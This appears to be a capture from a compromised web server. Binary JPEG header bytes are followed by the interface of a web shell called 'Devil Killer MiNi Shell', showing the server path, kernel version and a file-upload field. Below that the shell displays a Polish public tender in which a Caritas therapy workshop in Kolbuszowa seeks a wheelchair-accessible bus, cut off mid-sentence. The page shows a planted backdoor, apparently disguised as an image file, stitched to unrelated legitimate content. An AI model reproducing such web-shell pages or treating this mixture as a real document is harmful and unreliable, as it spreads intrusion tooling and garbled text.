JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240105/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240105/0001360001-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> ZAKUP WRAZ Z DOSTAWĄ FABRYCZNIE NOWEGO AUTOBUSU PRZYSTOSOWANEGO DO PRZEWOZU OSÓB NIEPEŁNOSPRAWNYCH NA POTRZEBY WARSZTATÓW TERAPII ZAJĘCIOWEJ CARITAS DIECEZJI RZESZOWSKIEJ W KOLBUSZOWEJ </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Caritas Diecezji Rzeszowskiej Warsztaty Terapii Zajęciowej w Kolbuszowej</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">NIP 8141591065</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Tyszkiewiczów</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kolbuszowa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">36-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL823 - Rzeszowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">wtzkolbuszowa@wp.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://caritas.rzeszow.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> kościelna osoba prawna </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> katolicka organizacja charytatywna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> ZAKUP WRAZ Z DOSTAWĄ FABRYCZNIE NOWEGO AUTOBUSU PRZYSTOSOWANEGO DO PRZEWOZU OSÓB NIEPEŁNOSPRAWNYCH NA POTRZEBY WARSZTATÓW TERAPII ZAJĘCIOWEJ CARITAS DIECEZJI RZESZOWSKIEJ W KOLBUSZOWEJ </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-76b855d0-abbb-11ee-a06e-7a3efa199397</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00013600</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-01-05</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-76b855d0-abbb-11ee-a06e-7a3efa199397 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu platformy e-Zamówienia, która dostępna<br/>jest pod adresem: https://ezamowienia.gov.pl oraz poczty elektronicznej.<br/>Szczegóły zawarte zostały w pkt VIII, XII Instrukcji dla wykonawców - Rozdział I SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 8 ust. 1 Dekretu ogólnego w sprawie ochrony osób fizycznych w związku z<br/>przetwarzaniem danych osobowych w Kościele katolickim wydanego przez Konferencję Episkopatu Polski w dniu 13 marca 2018<br/>roku, podczas 378. Zebrania Plenarnego w<br/>Warszawie, na podstawie kan. 455 Kodeksu Prawa Kanonicznego, w związku z art. 18 Statutu KEP, po uzyskaniu specjalnego<br/>zezwolenia Stolicy Apostolskiej z dnia 3 czerwca 2017 roku, Caritas Diecezji Rzeszowskiej informuje, iż:<br/>1. Administratorem danych jest Caritas Diecezji Rzeszowskiej z siedzibą w Rzeszowie przy ul. Jana Styki 21.<br/>2. W Caritas Diecezji Rzeszowskiej został powołany inspektor danych osobowych: Pan Bartosz Grabowy, z którym w zakresie<br/>gromadzenia i przetwarzania danych osobowych ma Pani/Pan prawo kontaktu za pomocą poczty elektronicznej pod adresem:<br/>kancelaria@adwokatgrabowy.com, a przypadkach niecierpiących zwłoki pod nr telefonu: 604 301 339.<br/>3. Administrator danych gromadzi i przetwarza dane w zakresie działalności opiekuńczo – charytatywnej Kościoła w celu:<br/>1. pomocy społecznej, w ty rodzinom i osobom w trudnej sytuacji życiowej oraz wyrównywania szans tych rodzin i osób,<br/>2. ochrony i promocji zdrowia,<br/>3. działania na rzecz osób niepełnosprawnych,<br/>4. promocji zatrudnienia i aktywizacji zawodowej osób pozostających bez pracy i zagrożonych zwolnieniem z pracy,<br/>5. działalności wspomagającej rozwój gospodarczy, w tym rozwój przedsiębiorczości aby przeciwdziałać bezrobociu, nauki, edukacji,<br/>oświaty i wychowania,<br/>6. upowszechniania kultury fizycznej i sportu, zwłaszcza wśród biednych i niepełnosprawnych,<br/>7. ekologii i ochrony zwierząt oraz ochrony dziedzictwa przyrodniczego,<br/>8. przeciwdziałania patologiom społecznym,<br/>9. ratownictwa i ochrony ludności,<br/>10. pomocy ofiarom katastrof, klęsk żywiołowych, konfliktów zbrojnych i wojen w kraju i za granicą,<br/>11. rozwijania kontaktów i współpracy pomiędzy społeczeństwami,<br/>12. promocji i organizacji wolontariatu.<br/>4. Pani/Pana dane osobowe nie są udostępniane innym odbiorcom z wyłączeniem podmiotów do tego uprawnionych takich jak:<br/>1. podmioty upoważnione do odbioru danych osobowych na podstawie odpowiednich przepisów prawa,<br/>2. podmioty, które przetwarzają dane osobowe w imieniu Administratora danych na podstawie zawartej z Administratorem umowy<br/>powierzenia przetwarzania danych osobowych.<br/>5. Pani/Pana dane osobowe po zrealizowaniu celu, dla którego zostały zebrane, będą przetwarzane w celach archiwalnych i<br/>przechowywane przez okres niezbędny wynikający z przepisów i umów dotyczących archiwizowania dokumentów obowiązujących u<br/>Administratora danych.<br/>6. Posiada Pani/Pan prawo do:<br/>1. żądania od Administratora danych dostępu do danych osobowych;<br/>2. sprostowania danych;<br/>3. usunięcia danych osobowych;<br/>4. ograniczenia przetwarzania danych osobowych;<br/>5. wniesienia sprzeciwu wobec przetwarzania danych osobowych;<br/>6. przenoszenia danych osobowych w dowolnym momencie wobec przetwarzania danych osobowych bez wpływu na zgodność z<br/>prawem przetwarzania, którego dokonano na podstawie zgody przed jej cofnięciem;<br/>7. cofnięcia zgody na przetwarzanie danych osobowych;<br/>8. wniesienia skargi do organu nadzorczego w postaci Kościelnego Inspektora Ochrony Danych</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Administrator danych informuje, że<br/>1. podanie danych osobowych jest dobrowolne, jednakże brak ich niekiedy uniemożliwia współpracę, udzielenie pomocy w zakresie działalności Administratora danych;<br/>2. nie będzie zakresie udostępnionych danych podejmować zautomatyzowanych decyzji, w tym w zakresie profilowania.<br/>8. W zakresie regulacji prawnych Administrator informuje, że:<br/>1. Dekretem Biskupa Rzeszowskiego z dnia 12 maja 1992 roku, L.dz. 240/92 utworzono<br/>Caritas Diecezji Rzeszowskiej (Administrator danych), która jest publiczną kościelną osobą prawną w rozumieniu kan. 116 §1 i §2<br/>Kodeksu Prawa Kanonicznego.<br/>2. Zgodnie z art. 7 ust. 2 pkt 3) ustawy z dnia 17 maja 1989 roku o stosunku Państwa do<br/>Kościoła Katolickiego w Rzeczypospolitej Polskiej (Dz.U. z 2018 r. poz. 380 j.t. z poźn. zm.) Caritas Diecezji Rzeszowskiej<br/>(Administrator danych) jest osobą prawną.<br/>3. Na podstawie art. 91 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 roku w sprawie<br/>ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/we (Ogólne Rozporządzenie o Ochronie Danych) (Dz.Urz.UE.l nr 119, str. 1), jeżeli w państwie<br/>członkowskim w momencie wejścia w/w rozporządzenia w życie kościoły i związki lub wspólnoty wyznaniowe stosują szczegółowe<br/>zasady ochrony osób fizycznych w związku z przetwarzaniem, zasady takie mogą być stosowane, pod warunkiem, że są<br/>dostosowane do przedmiotowego rozporządzenia.<br/>9. Konferencja Episkopatu Polski w dniu 13 marca 2018 roku podczas 378 Zebrania Plenarnego w Warszawie, na podstawie kan.<br/>455 Kodeksu Prawa Kanonicznego, w związku z art. 18 Statutu Konferencji Episkopatu Polski, po uzyskaniu specjalnego zezwolenia<br/>Stolicy Apostolskiej z dnia 3 czerwca 2017 roku wydała Dekret ogólny w sprawie ochrony osób fizycznych w związku z<br/>przetwarzaniem danych osobowych w<br/>Kościele katolickim, który w art. 4 stanowi, iż przepisy dekretu stosuje się do publicznych kościelnych osób prawnych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">L.Dz. 3/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest „Zakup wraz z dostawą fabrycznie nowego wyprodukowanego nie wcześniej niż w 2023<br/>roku autobusu, z liczbą pasażerów 19 + kierowca, przystosowanego do przewozu osób niepełnosprawnych w tym na wózku<br/>inwalidzkim na potrzeby Warsztatów Terapii Zajęciowej Caritas Diecezji Rzeszowskiej w Kolbuszowej”.<br/>2. Miejscem dostawy jest: Warsztaty Terapii Zajęciowej Caritas Diecezji Rzeszowskiej w Kolbuszowej, ul. Tyszkiewiczów 3,<br/>36-100 Kolbuszowa<br/>3. Przedmiot zamówienia jest dofinansowany ze środków Państwowego Funduszu Rehabilitacji Osób Niepełnosprawnych –<br/>w ramach obszaru D programu pn.: „Program wyrównywania różnic między regionami III rok 2023”<br/>Parametry techniczne przedmiotu zamówienia i wymagania jakościowe odnoszące się do głównych elementów przedmiotu<br/>zamówienia zgodnie z art99 i następne uPzp – określa poniższy Opis przedmiotu zamówienia:<br/>A. NADWOZIE:<br/>- nadwozie typu autobus, liczba miejsc dla pasażerów – 19 + kierowca, w tym przystosowane 1 miejsce dla wózków<br/>inwalidzkich z tyłu autobusu z opcją demontażu foteli tylnych co umożliwi transport osób niepełnosprawnych na wózkach<br/>inwalidzkich w specjalnie przystosowanym stanowisku wózka inwalidzkiego. Stanowisko wózka homologowane<br/>wyposażone w specjalne szyny, pasy, pasy bezpieczeństwa dla osoby niepełnosprawnej oraz najazdy umożliwiające<br/>wprowadzenie wózka inwalidzkiego. Nadwozie całkowicie przeszklone z fabrycznymi drzwiami bocznymi przesuwanymi<br/>(prawe) otwieranymi elektrycznie poprzez oryginalny mechanizm. Autobus fabrycznie nowy rok produkcji min 2023 sprawny<br/>technicznie, wolny od wad konstrukcyjnych co będzie potwierdzone homologacją i przeglądem przedsprzedażnym,<br/>- szyby panoramiczne gięte, pojedyncze, przyciemniane,<br/>- szyba czołowa przyciemniana z filtrem,<br/>- osłona przeciwsłoneczna dla kierowcy i pasażera + półki nad przednią szybą,<br/>- stopień drzwi bocznych przy drzwiach przesuwanych wysuwany elektrycznie,<br/>- kolor do wyboru po rozstrzygnięciu oferty ze standardowej palety producenta<br/>- wysokość przestrzeni pasażerskiej minimum 1850 mm,<br/>- elektrycznie regulowane i podgrzewane lusterka zewnętrzne z kierunkowskazami,<br/>- elektrycznie opuszczane szyby w drzwiach przednich fabryczne,<br/>- przeźroczysta zasłona za kierowcą + bariera z poręczą za kierowcą,<br/>- drzwi tylne dwuskrzydłowe, z przeszkleniem, otwierane na min 180 stopni,<br/>- zawieszenie fabrycznie wzmocnione,<br/>- rozstaw osi minimum 4300 mm,<br/>- długość całkowita minimum 7300 mm<br/>- dopuszczalna masa całkowita minimum 5000 kg.<br/>B. SILNIK: wysokoprężny diesla, o pojemności minimum 1950 cm3, moc silnika minimum 175 KM, wersja silnika EURO VI,<br/>zbiornik paliwa min. 80 litrów.<br/>C. BEZPIECZEŃSTWO:<br/>- system zapobiegający zablokowaniu się kół podczas hamowania ABS i elektroniczny system podziału siły hamowania<br/>EBV,<br/>- system optymalizacji przyczepności podczas przyspieszania ASR,<br/>- system stabilizacji toru jazdy ESP,<br/>- hamulce tarczowe na przedniej i tylnej osi,<br/>- układ hamulcowy hydrauliczny dwu obwodowy,<br/>- hamulec postojowy,<br/>- poduszka powietrzna dla kierowcy,<br/>- poduszka powietrzna dla pasażera.<br/>D. UKŁAD PRZENIESIENIA NAPĘDU:<br/>- napęd na koła tylne,<br/>- koła bliźniacze z tyłu.<br/>E. UKŁAD KIEROWNICZY:<br/>- układ kierowniczy ze wspomaganiem,<br/>- kolumna kierownicy regulowana w dwóch płaszczyznach, - blokada koła kierownicy.<br/>F. KOŁA/OPONY:<br/>- koła i ogumienie na samochodzie: minimum R16 C, - koło zapasowe pełnowymiarowe umieszczone pod ramą, - drugi<br/>komplet kół z oponami zimowymi (felgi z oponami),<br/>- ogumienie bezdętkowe.<br/>G. WYPOSAŻENIE FUNKCJONALNE:<br/>- centralny zamek sterowany falami radiowymi,<br/>- alarm antywłamaniowy,<br/>- fabryczny immobiliser,<br/>- przednia szyba ogrzewana,<br/>- trzecie światło stop z tyłu pojazdu + światła boczne obrysowe,<br/>- lusterko wsteczne wewnętrzne, - gniazdo 12V,<br/>- kamera cofania z wyświetlaczem,<br/>- lampy przeciwmgielne przednie z funkcją doświetlania zakrętów, - lampy przeciwmgielne tylne,<br/>- światła wsteczne,<br/>- chlapacze przód i tył,<br/>- siedzenie kierowcy komfortowe hydraulicznie resorowane + podłokietnik, - napinacze pasów 3-pkt dla kierowcy,<br/>- poręcze ułatwiające wsiadanie i wysiadanie pasażerów z autobusu,<br/>- zasłonki przeciwsłoneczne w oknach przesuwane na szynie,<br/>- izolacja dźwiękowo termiczna przedziału pasażerskiego,<br/>- światła tylne awaryjne,<br/>- oznakowanie pojazdu „przewóz osób niepełnosprawnych”,<br/>- kompletne 1 stanowisko wózka inwalidzkiego, pasy 4 pkt do mocowania wózka, pasy 2 pkt do mocowania pasażera,<br/>- najazdy służące do wprowadzania wózka inwalidzkiego.<br/>H. PRZESTRZEŃ PASAŻERSKA:<br/>- zamontowanie ramek okiennych (parapety i słupki okienne) z tworzywa ABS (łatwo zmywalne), a ściany podokienne wraz z<br/>sufitem pokryte tapicerką,<br/>- tapicerka z izolacją termiczną,<br/>- oświetlenie przestrzeni pasażerskiej dzień, noc, + elektroniczny panel sterujący natężeniem,<br/>- podświetlony stopień wejścia,<br/>- podłoga płaska na całym pojeździe z materiału antypoślizgowego,<br/>- szyberdach – wyjście awaryjne homologowane,<br/>- montaż foteli sztywne homologowane, 3-pkt pasy bezpieczeństwa, podłokietniki regulowane, uchwyt, zagłówek,<br/>- wybijaki do szyb zamontowane na słupkach bocznych, oznaczenie wyjść awaryjnych, - fotele tylne demontowane w celu<br/>transportu osób na wózkach inwalidzkich, - wentylator nadmuchowy i wyciągowy.<br/>I. WYPOSAŻENIE DODATKOWE:<br/>- skrzynia biegów manualna co najmniej 6-biegowa (6 biegów do przodu),<br/>- elektryczne sterowanie drzwi przesuwnych ( prawe)<br/>- radioodtwarzacz z USB i wzmacniaczem, mikrofon z przełącznikiem, przewód spiralny i uchwyt mikrofonu,<br/>- głośniki w przedniej części autobusu,<br/>- głośniki w przestrzeni pasażerskiej min 4 szt.<br/>- klimatyzacja przedziału kierowcy oryginalna,<br/>- klimatyzacja dachowa części pasażerskiej z wydmuchem centralnym min. 5kW, - ogrzewanie wodne postojowe ze<br/>sterownikiem przestrzeni pasażerskiej z konwektorami na ścianach bocznych,<br/>- homologowany ogranicznik prędkości do 100 km/h,<br/>- tachograf cyfrowy,<br/>- zagłówek kierowcy i pasażera regulowany na wysokość,<br/>- szybkościomierz ze skalą w kilometrach,<br/>- wskaźnik temperatury zewnętrznej,<br/>- czujnik światła i deszczu,<br/>- regulacja zasięgu reflektorów,<br/>- kontrolka zużycia płynu do spryskiwaczy,<br/>- kontrolka zużycia klocków hamulcowych,<br/>- kontrolka awarii oświetlenia pojazdu,<br/>- apteczka, 2 gaśnice, trójkąt, klin pod koła, podnośnik hydrauliczny samochodowy wraz z kluczem do demontażu kół,<br/>dodatkowa apteczka autobusowa,<br/>- kompletne przystosowanie pojazdu do przewozu 1 miejsc na wózkach inwalidzkich „szybki montaż” zgodnie z<br/>obowiązującymi normami i przepisami.<br/>- dokumenty w języku polskim:<br/>a) instrukcja użytkowania;<br/>b) karta gwarancyjna;<br/>c) książka serwisowa;<br/>d) informacje dotyczące serwisu autoryzowanego w okresie gwarancyjnym i pogwarancyjnym;<br/>J. GWARANCJA:<br/>- minimum 2 lata gwarancji na cały pojazd z wyposażeniem (baza + zabudowa) bez limitu kilometrów,<br/>- minimum 2 lata gwarancji na powłokę lakierniczą,<br/>- minimum 6 lat gwarancji na perforację nadwozia.<br/>Istnieje możliwość zaoferowania dodatkowej gwarancji (zgodnie z Rozdziałem XIX), przez co można uzyskać dodatkowe<br/>max. 30 pkt w kryterium – Gwarancja.<br/>K. WYMAGANIA DODATKOWE:<br/>- pełna dokumentacja umożliwiająca pierwszą rejestrację pojazdu w kategorii Autobus – pełna homologacja Autobusowa dla<br/>osób niepełnosprawnych, oraz misi spełniać warunki zawarte Rozporządzeniu Ministra Infrastruktury z dnia 31.02.2002 r. w<br/>sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia ( Dz. U. z 2016 r., poz.2022 ze zm.)<br/>- wszelkie zastosowane materiały i wyposażenie powinny posiadać odpowiednie certyfikaty, homologacje oraz powinny<br/>spełniać normy i przepisy w przewozie osobowym i osób niepełnosprawnych.<br/>- Wykonawca zobowiązany jest zapewnić serwis gwarancyjny przez Autoryzowane<br/>Stacje Obsługi w odległości do maksymalnie 100 km od WTZ Caritas Kolbuszowa </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34121000-1 - Autobusy i autokary</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">8 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający wybiera ofertę najkorzystniejszą na podstawie kryteriów oceny ofert określonych w<br/>dokumentach zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O 